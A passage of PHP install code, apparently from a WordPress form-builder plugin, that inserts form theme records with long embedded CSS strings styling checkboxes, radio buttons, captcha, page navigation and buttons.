border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #678B94;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #88B4BD;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #678B94;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 04 red\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #CEE4E4;\r\nmargin-bottom: 10px;\r\ncolor: #CEE4E4;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #8A6B63 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #C09F97;\r\nbackground: #86A0A7;\r\nbackground: -moz-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -webkit-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -o-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: -ms-linear-gradient(bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbackground: linear-gradient(to bottom, #E0B8AF 0%, #CAA298 49%, #BD9E96 84%, #B6958E 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E0D0CD;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\nmargin: 16px 10px 16px 0px;\r\ndisplay: inline-block;\r\nbackground: url([SITE_ROOT]/images/04/03/bg.png) no-repeat;\r\ntext-align: left;\r\nborder-radius: 0px;\r\nwidth: 300px;\r\npadding: 5px 10px;\r\ntext-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #8A6B63;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #B98476 ;\r\nbackground: -moz-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -webkit-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -o-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: -ms-linear-gradient(bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbackground: linear-gradient(to bottom, #CA9B8F 0%, #DBACA0 49%, #B98476 84%, #A38279 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #9B766D;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input 